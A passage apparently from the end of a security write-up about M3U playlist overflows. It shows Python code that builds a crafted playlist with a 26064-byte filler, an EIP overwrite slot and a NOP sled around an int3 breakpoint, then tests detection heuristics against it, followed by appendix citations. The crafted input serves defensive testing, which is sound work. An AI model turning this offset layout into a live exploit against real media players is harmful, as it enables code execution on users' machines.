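# Mirrors the layout of test1.m3u from step 12: filler, 4 bytes for EIP, NOP sled around an int3.
CRAFTED_M3U = b"A" * 26064 + b"BBBB" + b"\x90" * 25 + b"\xcc" + b"\x90" * 25

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_M3U), ("crafted", CRAFTED_M3U)):
        print(name, scan_m3u(sample))
```

The benign playlist produces no findings, while the crafted one trips all four heuristics on its single line. The entry-length check alone would already catch every file from step 3 onwards, since the shortest of them is 10000 bytes; the other checks exist so that a file padded below the length limit with non-text content is still noticed.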

[1] Appendix 3, page 89
[2] Appendix 1, page 85
[3] Appendix 3, page 89
[4] Appendix 2, page 87
[5] Appendix 3, page 89
[6] Appendix 3, page 89
[7] Appendix 3, page 89
[8] Appendix 1, page 85
[9] Appendix 3, page 89
[10] Appendix 1, page 85
[11] Appendix 1, page 85
[12] Appendix 3, page 89
[13] Appendix 3, page 89
[14] Appendix 3, page 89
[15] Appendix 3, page 89
[16] Appendix 3, page 89
[17] Appendix 3, page 89
[18] Appendix 4, page 90
